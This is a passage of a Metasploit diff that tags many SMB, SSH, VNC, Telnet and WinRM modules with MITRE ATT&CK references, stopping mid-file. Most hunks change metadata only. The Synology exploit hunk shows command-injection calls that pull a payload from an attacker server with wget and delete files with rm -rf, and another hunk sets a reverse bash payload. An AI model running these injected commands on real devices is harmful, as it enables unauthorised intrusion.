diff --git a/modules/auxiliary/admin/smb/change_password.rb b/modules/auxiliary/admin/smb/change_password.rb index 3f056936151a1..f4df27d0c1853 100644 --- a/modules/auxiliary/admin/smb/change_password.rb +++ b/modules/auxiliary/admin/smb/change_password.rb @@ -26,6 +26,7 @@ def initialize(info = {}) ], 'References' => [ ['URL', 'https://github.com/fortra/impacket/blob/master/examples/changepasswd.py'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index 9a73089b15244..8c9f556b8da00 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -31,6 +31,7 @@ def initialize 'j0hn__f' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/delete_file.rb b/modules/auxiliary/admin/smb/delete_file.rb index 1b65c2b2b6843..747ffc749c3dc 100644 --- a/modules/auxiliary/admin/smb/delete_file.rb +++ b/modules/auxiliary/admin/smb/delete_file.rb @@ -30,6 +30,9 @@ def initialize 'mubix' # copied from hdm upload_file module ], 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] + ], 'Notes' => { 'Stability' => [OS_RESOURCE_LOSS], 'SideEffects' => [], diff --git a/modules/auxiliary/admin/smb/download_file.rb b/modules/auxiliary/admin/smb/download_file.rb index d7e7743d2293b..cdcfd87e81979 100644 --- a/modules/auxiliary/admin/smb/download_file.rb +++ b/modules/auxiliary/admin/smb/download_file.rb @@ -29,7 +29,10 @@ def initialize 'Stability' => [CRASH_SAFE], 'SideEffects' => [], 'Reliability' => [] - } + }, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] + ] ) register_options([ diff --git a/modules/auxiliary/admin/smb/list_directory.rb b/modules/auxiliary/admin/smb/list_directory.rb index 374f0865c36fe..c883f9355a3bf 100644 --- a/modules/auxiliary/admin/smb/list_directory.rb +++ b/modules/auxiliary/admin/smb/list_directory.rb @@ -27,6 +27,7 @@ def initialize 'hdm' ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/ms17_010_command.rb b/modules/auxiliary/admin/smb/ms17_010_command.rb index 38d598e61a095..a0b2a38a6bae8 100644 --- a/modules/auxiliary/admin/smb/ms17_010_command.rb +++ b/modules/auxiliary/admin/smb/ms17_010_command.rb @@ -41,6 +41,7 @@ def initialize(info = {}) [ 'URL', 'https://github.com/worawit/MS17-010' ], [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ], [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'DisclosureDate' => '2017-03-14', 'Notes' => { diff --git a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb index f9ff4e0698ed3..5eaf3be37d00c 100644 --- a/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb +++ b/modules/auxiliary/admin/smb/psexec_ntdsgrab.rb @@ -35,7 +35,8 @@ def initialize(info = {}) 'References' => [ [ 'URL', 'http://sourceforge.net/projects/smbexec' ], [ 'URL', 'https://www.optiv.com/blog/owning-computers-without-shell-access' ], - [ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ] + [ 'ATT&CK', Mitre::Attack::Technique::T1003_003_NTDS ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index 27ca1898fca0c..0d23da474befd 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -29,7 +29,8 @@ def initialize 'References' => [ ['CVE', '2010-0926'], ['OSVDB', '62145'], - ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'] + ['URL', 'http://www.samba.org/samba/news/symlink_attack.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index 856c6d9345611..908c91949df29 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -26,6 +26,7 @@ def initialize 'hdm' # metasploit module ], 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ] ], 'License' => MSF_LICENSE, 'Notes' => { diff --git a/modules/auxiliary/admin/smb/webexec_command.rb b/modules/auxiliary/admin/smb/webexec_command.rb index ce6f46611b172..5e28c25e8215d 100644 --- a/modules/auxiliary/admin/smb/webexec_command.rb +++ b/modules/auxiliary/admin/smb/webexec_command.rb @@ -30,7 +30,8 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://webexec.org'], - ['CVE', '2018-15442'] + ['CVE', '2018-15442'], + ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES] ], 'Notes' => { 'Stability' => [CRASH_SAFE], diff --git a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb index a8a290d996507..214a32700b7b5 100644 --- a/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb +++ b/modules/auxiliary/admin/vnc/realvnc_41_bypass.rb @@ -29,6 +29,7 @@ def initialize(info = {}) ['OSVDB', '25479'], ['URL', 'https://web.archive.org/web/20080102163013/http://secunia.com/advisories/20107/'], ['CVE', '2006-2369'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC], ], 'DisclosureDate' => '2006-05-15', 'Notes' => { diff --git a/modules/auxiliary/scanner/smb/smb_login.rb b/modules/auxiliary/scanner/smb/smb_login.rb index 3dd4715141197..dee6e214ef764 100644 --- a/modules/auxiliary/scanner/smb/smb_login.rb +++ b/modules/auxiliary/scanner/smb/smb_login.rb @@ -43,6 +43,7 @@ def initialize ], 'References' => [ [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ], ], 'License' => MSF_LICENSE, 'DefaultOptions' => { diff --git a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb index 6c59f460a1409..778263eafdbea 100644 --- a/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb @@ -33,7 +33,8 @@ def initialize(info = {}) ['CVE', '2018-16158'], ['EDB', '45283'], ['URL', 'https://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'], - ['URL', 'https://www.ctrlu.net/vuln/0006.html'] + ['URL', 'https://www.ctrlu.net/vuln/0006.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-07-18', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb index 8ef9ec6e03a67..bc8232e9c2e0d 100644 --- a/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/fortinet_backdoor.rb @@ -29,7 +29,8 @@ def initialize(info = {}) ['EDB', '39224'], ['PACKETSTORM', '135225'], ['URL', 'https://seclists.org/fulldisclosure/2016/Jan/26'], - ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'] + ['URL', 'https://blog.fortinet.com/post/brief-statement-regarding-issues-found-with-fortios'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2016-01-09', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb index f2d06e9e0585e..90c1e3c605518 100644 --- a/modules/auxiliary/scanner/ssh/juniper_backdoor.rb +++ b/modules/auxiliary/scanner/ssh/juniper_backdoor.rb @@ -26,7 +26,8 @@ def initialize(info = {}) 'References' => [ ['CVE', '2015-7755'], ['URL', 'https://www.rapid7.com/blog/post/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor/'], - ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'] + ['URL', 'https://kb.juniper.net/InfoCenter/index?page=content&id=JSA10713'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2015-12-20', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb index c90f6c0f24200..5e39df507981d 100644 --- a/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb +++ b/modules/auxiliary/scanner/ssh/libssh_auth_bypass.rb @@ -36,7 +36,8 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2018-10933'], - ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'] + ['URL', 'https://www.libssh.org/security/advisories/CVE-2018-10933.txt'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DisclosureDate' => '2018-10-16', 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb index a66ca27b0dfc4..2acecea4b8b38 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enum_git_keys.rb @@ -22,7 +22,10 @@ def initialize(info = {}) 'Author' => ['Wyatt Dahlenburg (@wdahlenb)'], 'Platform' => ['linux'], 'SessionTypes' => ['shell', 'meterpreter'], - 'References' => [['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection']], + 'References' => [ + ['URL', 'https://docs.github.com/en/authentication/connecting-to-github-with-ssh/testing-your-ssh-connection'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] + ], 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index a1c411d256d36..1eac991d824e0 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -28,7 +28,8 @@ def initialize }, 'Author' => ['todb'], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'VERBOSE' => false } # Disable annoying connect errors diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 6953aa11f4021..907b1864462f7 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -35,7 +35,10 @@ def initialize be shared between subject keys or only belong to a single one. }, 'Author' => ['todb', 'RageLtMan'], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index a0a4c9bdf10fa..f758c71f18faa 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -26,7 +26,8 @@ def initialize }, 'Author' => 'egypt', 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index 38ac70627802a..eecb689ea5de5 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -21,7 +21,8 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2012-1803' ], [ 'EDB', '18779' ], - [ 'US-CERT-VU', '889195' ] + [ 'US-CERT-VU', '889195' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Author' => [ 'Borja Merino ', diff --git a/modules/auxiliary/scanner/vnc/ard_root_pw.rb b/modules/auxiliary/scanner/vnc/ard_root_pw.rb index 78d3adf7ba245..d0ef3b604b9b5 100644 --- a/modules/auxiliary/scanner/vnc/ard_root_pw.rb +++ b/modules/auxiliary/scanner/vnc/ard_root_pw.rb @@ -14,7 +14,8 @@ def initialize 'Description' => 'Enable and set root account to a chosen password on unpatched macOS High Sierra hosts with either Screen Sharing or Remote Management enabled.', 'References' => [ ['CVE', '2017-13872'], - ['URL', 'https://support.apple.com/en-us/HT208315'] + ['URL', 'https://support.apple.com/en-us/HT208315'], + ['ATT&CK', Mitre::Attack::Technique::T1021_005_VNC] ], 'Author' => 'jgor', 'License' => MSF_LICENSE diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index f69fa4fac0c6f..8fdc830500b98 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -26,7 +26,8 @@ def initialize 'jduck' ], 'References' => [ - [ 'CVE', '1999-0506'] # Weak password + [ 'CVE', '1999-0506'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index f5997805fe0f3..6f2bb30591be2 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -17,7 +17,10 @@ def initialize This module runs arbitrary Windows commands using the WinRM Service }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index a39146c1f7764..a6c85810e2156 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -30,7 +30,8 @@ module without SSL, the 'AllowUnencrypted' winrm option must be set. }, 'Author' => [ 'thelightcosine', 'smashery' ], 'References' => [ - [ 'CVE', '1999-0502'] # Weak password + [ 'CVE', '1999-0502'], # Weak password + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] ], 'License' => MSF_LICENSE ) diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index 2db73ca878c63..c020d1f3fd6cf 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -19,7 +19,10 @@ def initialize winrm option must be set. }, 'Author' => [ 'thelightcosine' ], - 'License' => MSF_LICENSE + 'License' => MSF_LICENSE, + 'References' => [ + [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ] + ] ) register_options( diff --git a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb index 3b80bacf63822..fc17ef5b25847 100644 --- a/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb +++ b/modules/exploits/apple_ios/ssh/cydia_default_ssh.rb @@ -26,7 +26,8 @@ def initialize(info = {}) 'hdm' ], 'References' => [ - ['OSVDB', '61284'] + ['OSVDB', '61284'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' diff --git a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb index db93ccdad7e51..9ce07224563df 100644 --- a/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb +++ b/modules/exploits/linux/http/acronis_cyber_infra_cve_2023_45249.rb @@ -42,7 +42,8 @@ def initialize(info = {}) 'References' => [ ['CVE', '2023-45249'], ['URL', 'https://security-advisory.acronis.com/advisories/SEC-6452'], - ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'] + ['URL', 'https://attackerkb.com/topics/T2b62daDsL/cve-2023-45249'], + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/http/asuswrt_lan_rce.rb b/modules/exploits/linux/http/asuswrt_lan_rce.rb index 34f56c81f4a3c..1342cb373b4bb 100644 --- a/modules/exploits/linux/http/asuswrt_lan_rce.rb +++ b/modules/exploits/linux/http/asuswrt_lan_rce.rb @@ -33,7 +33,8 @@ def initialize(info = {}) ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], ['URL', 'https://seclists.org/fulldisclosure/2018/Jan/78'], ['CVE', '2018-5999'], - ['CVE', '2018-6000'] + ['CVE', '2018-6000'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Targets' => [ [ diff --git a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb index 85d67626f59da..82c300184df4b 100644 --- a/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb +++ b/modules/exploits/linux/http/beyondtrust_pra_rs_unauth_rce.rb @@ -29,7 +29,8 @@ def initialize(info = {}) ['CVE', '2025-1094'], # The SQL injection in PostgreSQL code. ['URL', 'http://web.archive.org/web/20241226144006/https://www.beyondtrust.com/trust-center/security-advisories/bt24-10'], # BeyondTrust Advisory ['URL', 'https://www.postgresql.org/support/security/CVE-2025-1094/'], # PostgreSQL Advisory - ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'] # Rapid7 Analysis + ['URL', 'https://attackerkb.com/topics/G5s8ZWAbYH/cve-2024-12356/rapid7-analysis'], # Rapid7 Analysis + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'DisclosureDate' => '2024-12-16', 'Platform' => [ 'linux', 'unix' ], diff --git a/modules/exploits/linux/http/f5_icontrol_exec.rb b/modules/exploits/linux/http/f5_icontrol_exec.rb index f132df4b1a06c..6dca771cce14b 100644 --- a/modules/exploits/linux/http/f5_icontrol_exec.rb +++ b/modules/exploits/linux/http/f5_icontrol_exec.rb @@ -24,7 +24,8 @@ def initialize(info = {}) ], 'References' => [ ['CVE', '2014-2928'], - ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'] + ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, diff --git a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb index cbb771403d54e..a0921d06cf375 100644 --- a/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb +++ b/modules/exploits/linux/http/nagios_xi_plugins_check_plugin_authenticated_rce.rb @@ -53,7 +53,8 @@ module does not presently support exploiting these targets. ], 'References' => [ ['CVE', '2019-15949'], - ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'] # original PHP exploit + ['URL', 'https://github.com/jakgibb/nagiosxi-root-rce-exploit'], # original PHP exploit + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Payload' => { 'BadChars' => "\x00" }, 'Targets' => [ @@ -77,7 +78,9 @@ module does not presently support exploiting these targets. 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }, 'Payload' => { + # rubocop:disable Lint/DetectMetadataTrailingLeadingWhitespace 'Append' => ' & disown', # the payload must be disowned after execution, otherwise cleanup fails + # rubocop:enable Lint/DetectMetadataTrailingLeadingWhitespace 'BadChars' => '"' } } diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb index 27c429b14e769..398540005b218 100644 --- a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb @@ -29,7 +29,8 @@ def initialize(info = {}) ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], ['URL', 'https://www.debian.org/security/2017/dsa-3942'], ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], - ['CVE', '2017-11610'] + ['CVE', '2017-11610'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'Platform' => 'linux', 'Targets' => [ diff --git a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb index 49c582ac029c1..49c434e805872 100644 --- a/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb +++ b/modules/exploits/linux/http/synology_dsm_smart_exec_auth.rb @@ -39,7 +39,8 @@ def initialize(info = {}) [ 'CVE', '2017-15889' ], [ 'EDB', '43190' ], [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-synology-storagemanager-smart-cgi-remote-command-execution/' ], - [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ] + [ 'URL', 'https://synology.com/en-global/security/advisory/Synology_SA_17_65_DSM' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Privileged' => true, 'Stance' => Msf::Exploit::Stance::Aggressive, @@ -179,20 +180,20 @@ def exploit }) print_status('Cleaning env') - inject_request(cookie, token, cmd = 'rm -rf /a') - inject_request(cookie, token, cmd = 'rm -rf b') + inject_request(cookie, token, 'rm -rf /a') + inject_request(cookie, token, 'rm -rf b') command = "#{datastore['SRVHOST']}:#{datastore['SRVPORT']}".split(//) command_space = 22 - "echo -n ''>>/a".length command_space -= 1 command.each_slice(command_space) do |a| a = a.join('') vprint_status("Staging wget with: echo -n '#{a}'>>/a") - inject_request(cookie, token, cmd = "echo -n '#{a}'>>/a") + inject_request(cookie, token, "echo -n '#{a}'>>/a") end print_status('Requesting payload pull') register_file_for_cleanup('/usr/syno/synoman/webman/modules/StorageManager/b') register_file_for_cleanup('/a') - inject_request(cookie, token, cmd = 'wget -i /a -O b') + inject_request(cookie, token, 'wget -i /a -O b') # at this point we let the HTTP server call the last stage # wfsdelay should be long enough to hold out for everything to download and run rescue ::Rex::ConnectionError diff --git a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb index c7e476342f83d..c6067e58ee23c 100644 --- a/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb +++ b/modules/exploits/linux/http/tp_link_sc2020n_authenticated_telnet_injection.rb @@ -36,7 +36,8 @@ def initialize(info = {}) }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'References' => [ - [ 'CVE', '2013-2578'] + [ 'CVE', '2013-2578'], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ] ], 'Targets' => [ [ 'Automatic', {} ], diff --git a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb index 5c813e6be1e91..61854e380a030 100644 --- a/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb +++ b/modules/exploits/linux/http/wazuh_auth_rce_cve_2025_24016.rb @@ -31,7 +31,8 @@ def initialize(info = {}) 'References' => [ ['CVE', '2025-24016'], ['URL', 'https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh'], - ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'] + ['URL', 'https://attackerkb.com/topics/piW0q4r5Uy/cve-2025-24016'], + ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES] ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'linux'], diff --git a/modules/exploits/linux/misc/igel_command_injection.rb b/modules/exploits/linux/misc/igel_command_injection.rb index 2857a90861e48..72e42d2fbc67b 100644 --- a/modules/exploits/linux/misc/igel_command_injection.rb +++ b/modules/exploits/linux/misc/igel_command_injection.rb @@ -35,7 +35,9 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2025-34082' ], [ 'URL', 'https://kb.igel.com/securitysafety/en/isn-2021-01-igel-os-remote-command-execution-vulnerability-41449239.html' ], - [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ] + [ 'URL', 'https://www.igel.com/wp-content/uploads/2021/02/lxos_11.04.270.txt' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ], # Telnet service + [ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ] ], 'Platform' => ['linux'], 'Arch' => [ARCH_X86, ARCH_X64], diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index d909e5ec2cfa5..78e45b09fd918 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -42,6 +42,7 @@ def initialize(info = {}) 'References' => [ ['CVE', '2015-0936'], ['URL', 'https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15'], # Original Disclosure + ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH], ], 'DisclosureDate' => '2015-04-01', # Not a joke 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/exagrid_known_privkey.rb b/modules/exploits/linux/ssh/exagrid_known_privkey.rb index 998634663839d..8a0b3b200d191 100644 --- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb +++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb @@ -40,7 +40,8 @@ def initialize(info = {}) 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key - [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2016-04-07', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 64125268d4d08..4d9a508626f11 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -40,7 +40,8 @@ def initialize(info = {}) [ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ], [ 'CVE', '2012-1493' ], [ 'OSVDB', '82780' ], - [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ] + [ 'URL', 'https://www.rapid7.com/blog/post/2012/06/25/press-f5-for-root-shell' ], + [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ] ], 'DisclosureDate' => '2012-06-11', 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, diff --git a/modules/exploits/linux/ssh/ibm_drm_a3user.rb b/modules/exploits/linux/ssh/ibm_drm_a3user.rb index c6367baef5436..30e1b7c4044c8 100644 --- a/modules/exploits/linux/ssh/ibm_drm_a3user.rb +++ b/modules/exploits/linux/ssh/ibm_drm_a3user.rb @@ -28,7 +28,8 @@ def initialize(info = {}) [ 'CVE', '2020-4429' ], # insecure 